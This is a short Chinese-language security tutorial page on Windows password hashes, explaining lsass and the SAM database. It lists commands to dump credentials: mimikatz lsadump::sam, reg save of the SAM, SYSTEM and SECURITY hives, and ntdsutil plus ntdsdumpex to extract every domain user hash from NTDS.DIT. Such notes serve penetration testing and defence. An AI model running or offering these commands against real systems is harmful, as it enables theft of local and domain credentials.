密码HASH

DeeLMind大约 1 分钟

密码HASH

DeeLMind 提醒

注意权限问题!!!

lsass进程

lsass (Local Security Authority Subsystem Service)是一个 Windows 进程,负责处理操作系统的安全策略。例如,当您登录到 Windows 用户帐户或服务器时,lsass.exe 会验证登录名和密码。

SAM

安全帐户管理器 (SAM Security Accounts Manager) 是Microsoft Windows 操作系统 ( OS ) 中的一个数据库文件,其中包含用户名和密码。 SAM 的主要目的是使系统更加安全,并在系统被盗时防止数据泄露。SAM 可用于不同版本的 Windows,包括Windows XP、Windows Vista、Windows 7、Windows 8.1、 Windows 10和Windows 11。 在用户尝试登录期间,Windows 系统将要求输入用户名和密码。输入密码后,将根据 SAM 中的密码HASH进行验证。如果用户名和相关密码与 SAM 中的条目匹配,则会发生一系列事件。这最终将导致授予用户访问系统的权限。

%SystemRoot%\system32\config\

SAM文件

SAM存放本地用户HASH。

  • 提取SAM
mimikatz lsadump::sam
reg save HKLM\SYSTEM system.hiv
reg save HKLM\SAM sam.hiv
reg save HKLM\SECURITY security.hiv

NTDS.DIT

NTDS.DIT存放域内所有用户HASH。

  • 提取NTDS.DIT
ntdsutil "ac i ntds" ifm "create full c:\\users\\tmp" q q
ntdsdumpex.exe -d "C:\Users\tmp\Active Directory\ntds.dit" -o hash.txt -s C:\Users\vagrant\Desktop\system.hiv
上次编辑于:
贡献者: DeeLMind